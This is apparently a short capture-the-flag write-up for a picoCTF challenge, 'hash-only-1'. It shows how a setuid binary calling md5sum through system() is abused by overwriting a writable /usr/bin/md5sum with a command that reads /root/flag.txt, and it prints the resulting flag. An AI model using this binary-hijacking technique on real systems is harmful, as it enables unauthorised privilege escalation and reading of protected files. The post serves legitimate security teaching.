Post

hash-only-1

Posted
By Elijah Lieu
1 min read

Description

Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!

Initial analysis

Using strings, we can see some key things about the binary:

  • The binary uses setuid and setgid to elevate privileges
  • The binary uses system to call the hashing function
  • The binary hashes using md5sum

We can then determine that md5sum is /usr/bin/md5sum, which we have write permissions to for some reason.

Exploit

We can then run the following to replace the md5sum binary with our own shell script:

1

echo "cat /root/flag.txt" > /usr/bin/md5sum

Flag

Finally, we can run flaghasher:

1
2
3

Computing the MD5 hash of /root/flag.txt.... 

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_54094e3e}
ctf pico pwn writeup
This post is licensed under CC BY 4.0 by the author.